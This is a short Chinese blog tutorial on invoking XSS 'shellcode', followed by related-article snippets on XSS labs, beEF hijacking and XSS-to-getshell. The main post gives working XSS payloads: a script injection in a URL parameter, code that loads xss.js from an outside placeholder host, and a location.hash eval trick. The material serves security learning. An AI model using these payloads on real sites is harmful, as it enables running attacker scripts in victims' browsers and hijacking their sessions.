XSS----shellcode的调用

最新推荐文章于 2024-02-27 09:20:26 发布
最新推荐文章于 2024-02-27 09:20:26 发布
阅读量670 收藏
点赞数
分类专栏: Web安全 #XSS
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39338006/article/details/101239510
版权

  • shellcode、exploit、poc

  1. shellcode:最初是指溢出程序和蠕虫病毒核心,实际上是指利用漏洞所执行的一段代码

  2. Exploit:英文意思利用,编写好的漏洞利用工具或程序,具有攻击性

  3. Poc:Proof of Concept缩写,是一段证明漏洞存在的程序代码 

  • 动态调用远程JavaScript(缺点是URL中容易显露出来)

  • 格式: 

https://www.xxxxx.com/index.php?sort=[exploit]

  • 可直接把shellcode写到URL中,如: 

https://www.xxxx.com/view.php?sort="><script>alert(/xss/)</script>
#或者赋值变量动态创建,假设机子的脚本位xss.js 如:
var s=document.createElement("script")
s.src="http://wwww.xxxx.com/xss.js";
document.getElementByTagName("head")[0].apendChild(s);

#当然这里亦可以使用jQuery来写是一样,而且会更简洁

  • 使用window.location.hash(这种方式不需要加载服务器上的脚本) ,示例:

http://www.xxxx.com/view.php?sort="><script>eval(location.hash.substr(1))</script>#alert('xss')

 

 

 

 

      

:::::::::
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xss-labs-master.rar
05-09
xss-labs-master靶机资源,有关于xss漏洞攻击专项练习,一共有二十关,也是小白的看门砖吧!
XSS漏洞-04】如何调用XSS漏洞的shellcode
m0_64378913的博客
05-15 1451
目录1 实验简介1.1 实验目的1.2 实验环境2 shellcode调用实验2.1 远程调用JS2.2 利用Windows.location.hash触发JS2.3 利用XSS下载器2.4 备选存储技术 在上两节中我们了解了XSS漏洞验证、语句构造与绕过的方法,而完整的XSS攻击会将shellcodeshellcode就是利用漏洞所执行的代码)存放在一个地方,然后在存在XSS漏洞的地方触发漏洞去调用代码。 1 实验简介 1.1 实验目的 模拟利用XSS漏洞执行shellcode的几种方法。 1.2 实
记一次XSS至getshell全过程!
hot_milk1的博客
02-27 716
偶然在一次渗透过程中发现一个客服系统聊天界面发现可以XSS对发送信息处进行抓包,可在content参数插入xss语句这是访客前台效果:这是后台管理的效果:而且只要客服查看信息,便可以执行XSS语句然并卵,本来想钓客服的cookie,登录后台,找到shell点,成功getshell(幻想时间),但是经过测试,发现该客服系统的session是受保护的,并不能窃取到cookie已经决定放弃这个点了,随后在审计源码后,发现了图片上传点老样子,抓包改后缀解码得知,不支持php的文件格式。
xss-labs.zip
03-18
xss-labs是一个网站,其中包含了20个含有XSS漏洞的网页,用于学习XSS
xss-labs靶场通关
10-13
xss-labs靶场通关
lucy-xss-filter
04-30
Lucy-XSSXssFilter,XssPreventer Lucy-XSS是一个包含两个防御模块的开源库,用于保护Web应用程序免受XSS攻击。 它支持基于白名单规则的安全策略。 当前的默认规则是Naver的标准。 您可以根据需要更改默认规则。 XssFilter 基于Java的库,支持设置白名单以保护Web应用程序的方法。 如果将过滤器与白名单方法一起使用,它将为XSS攻击的网站提供比使用黑名单方法的现有过滤器更严格的安全措施。 同时支持DOM和SAX解析器。 XssPreventer 使用apache-common-lang3库防止XSS攻击。 只需按如下所示转换所有输入字符串,即可在网络浏览器中将其识别为HTML标记。 < → < > → > " → " ' → ' XssFilter与VS XssPreventer 除HTM
XSS ShellCode调用
N1nG
09-23 2026
1.动态调用远程JavaScript 假设www.bug.com是某个页面含有一个XSS漏洞,Exploit如下: http://www.bug.com/view.php?sort=[Exploit] 可以直接把Shellcode写到URL参数中,如: http://www.bug.com/view.php?sort=">alert(/xss/) 方便起见可以把Shellcode写到其他
xssshellcode调用
weixin_43803070的博客
05-22 303
sshellcode 首先,我们来认识一下shellcode,所谓的shellcode就是指利用一个漏洞的时候所执行的脚本,在xss跨站脚本中,是指由Javascript等脚本编写的xss利用代码。 一、动态远程调用JavaScript 假设某个页面中由xss漏洞,所以我们可以把JavaScript代码放到目标网站的参数中。,但是这种方式有一个缺点,那就是容易被用户发现。所以为了方便起见,我们可以...
通过getelement定位XSS SHELLCODE
Quantum Intelligence
07-25 2862
      今天跟AMXSA在弄一个XSS的时候就讨论到,字符长度限制了70个,该XSS是出现在 , 后来他说对方过滤了 " 这样 只能有限的调用。开始我建议他 多弄几个 后来他尝试了发现不可以对方处理             想想平时我们XSS导入一个远程的JS就是为了执行更多的代码,更方便。    1.        window.k=document.createElement(Sc
XSSShellcode概念
ZHAOLUOLIN的博客
03-23 558
Shellcode:最初是溢出程序和蠕虫病毒的核心,实际上是指利用一个漏洞时所执行的代码。在XSS中,是指由JavaScript等脚本编写的XSS利用代码。 Exploit:表示完整编写好的漏洞利用工具。 Poc:是一段证明漏洞存在的程序代码片段。Shellcode一般直接写入页面中执行,但是实际中会有服务器端的过滤过对输入的一些限制等,所以攻击者往往把Shellcode写到远程服务器上,然后利
XSS漏洞04】XSS漏洞对shellcode调用方法
Fighting_hawk的博客
02-24 2905
1. shellcode可以存储在远程文件、URL、HTTP头、其他网页中; 2. 通过多种方式利用XSS漏铜触发shellcode执行; 3. 利用XSS下载器与http头信息的方法还需要加强。
xss-dvwa靶场详情
最新发布
04-06
dvwa靶场中的xss漏洞详情
XSS详细讲解
热门推荐
qq_44857938的博客
06-18 1万+
XSS 1.XSS简介 (1)XSS简介 XSS作为OWASP TOP 10之一。 XSS中文叫做跨站脚本攻击(Cross-site scripting),本名应该缩写为CSS,但是由于CSS(Cascading Style Sheets,层叠样式脚本)重名,所以更名为XSSXSS(跨站脚本攻击)主要基于javascript(js)来完成恶意的攻击行为。 XSS是一种经常出现在web应用中的计算机大全漏洞,也是web中最主流的攻击方式。那么什么是XSS呢? XSS是指恶意攻击者利用网站对用
xss跳转代码_记一次渗透测试从XSS到Getshell过程(详细到无语)
weixin_39671631的博客
11-22 888
0X00前言前段时间有幸和大佬们参加了一次一周的攻防演练,让我这个菜鸡体验到了红队的感觉。所以打算记录一下其中一个花了三天由xss存储到后台的踩坑过程,希望大佬们多带带。0X01钓鱼到了攻防演练的第二天,早上有个同事和我说这边的一个目标存在存储xss,已经打回了cookie,但是对方开启了http-only无法利用,让我帮忙看看能不能进行钓鱼或者什么的。于是我打开这个站看...
XSS漏洞-06】XSS漏洞利用案例(浏览器劫持、会话劫持、GetShell)—基于神器beEF
m0_64378913的博客
06-02 3954
(1)了解beEF工具的使用; (2)加深理解XSS漏洞的利用和危害; (3)掌握浏览器劫持的攻击方法; (4)掌握会话劫持的攻击方法; (5)掌握通过XSS漏洞GetShell的方法。
<web渗透-xss介绍>
weixin_45540964的博客
11-20 266
(1) .简介 --称为跨站脚本攻击 -主要基于.javascript_js 完成恶意的攻击行为 -js可以灵活的操作html,css和浏览器 --XSS通过精心构造(js)代码注入到网页中 由浏览器解释运行这段js,以达到攻击 -用户访问网页时,XSS脚本就会被提取出来 用户浏览器解析后就会收到攻击 --用户最简单的动作就是使用浏览器上网,并且浏览器中 存在javascript解析器, 但解析器并不会判断代码是否恶意 .XSS的漏洞在服务器上 .XSS的攻击对象
discuz xssshell
Coisini的博客
05-26 1410
Discuz XSS得webshell By racle @tian6.com 欢迎转帖.但请保留版权信息. 受影响版本:Discuz<=6.1.0,gbk+utf+big5 新增加完全JS利用版本,只有一个文件.ajax-racle.js.有效版本提升至DZ6.1(理论上7.0版本都可以,但是6.1以上版本都已经默认打上补丁),新增浏览器版本判断,对方浏览器为IE或FIREFOX都有效. ...
XSS也能getshell
u014213713的专栏
05-15 5518
我的想法是这样的 有很多CMS都有 修改模板或者修改文件的功能 我们可以自己构造一个外部的URL去post提交修改模板或其他文件 从而实现XSSgetshell !同样这方法能做很多事情比如增加管理员账号什么的 前提条件要管理员登陆状态下 若CMS系统有XSS漏洞那就更完美了 呵呵 我这里随便找了一套带文件增 删 改 的cms测试呵呵(这CMS也有XSS不过因为魔术原因利用起来不太利索,这
webshellXSS
weixin_34408624的博客
10-24 424
webshellXSS
xss-labs安装
07-28
XSS-labs是一个用于学习和测试跨站脚本攻击(XSS)的平台。根据引用\[1\],在学习了XSS的基础知识并完成了一些简单的XSS测试后,可以开始攻略XSS-labs。不过需要注意的是,对于XSS-labs,我们只需大致了解一些思路即可,因为在实际的应用中,很少会有这种复杂的情况,但在CTF比赛中可能会更常见。 根据引用\[2\],XSS-labs的安装和下载可以通过相关的渗透测试平台或者从官方网站获取。安装完成后,可以开始进行XSS攻击的实践。 在XSS-labs中,可以通过构造特定的payload来触发XSS漏洞。根据引用\[2\]和\[3\]的示例,可以使用ng-include或者src参数来构造包含XSS漏洞的URL。例如,可以构造一个类似于以下的payload来触发XSS漏洞: src='level1.php?name=<a type="text" href="javascript:alert(1)">' 或者 127.0.0.1/xss-labs/level15.php?src='level1.php?name=<a href="javascript:alert(/xss/)">' 通过构造合适的payload,可以利用XSS-labs平台进行XSS攻击的实践和学习。请注意,在实际应用中,XSS攻击是违法行为,请遵守法律法规并仅在合法授权的情况下进行安全测试。 #### 引用[.reference_title] - *1* *2* [渗透学习-靶场篇-XSS-labs(持续更新中)](https://blog.csdn.net/qq_43696276/article/details/127024861)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [xss-labs搭建及通关攻略](https://blog.csdn.net/K_ShenH/article/details/122765092)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值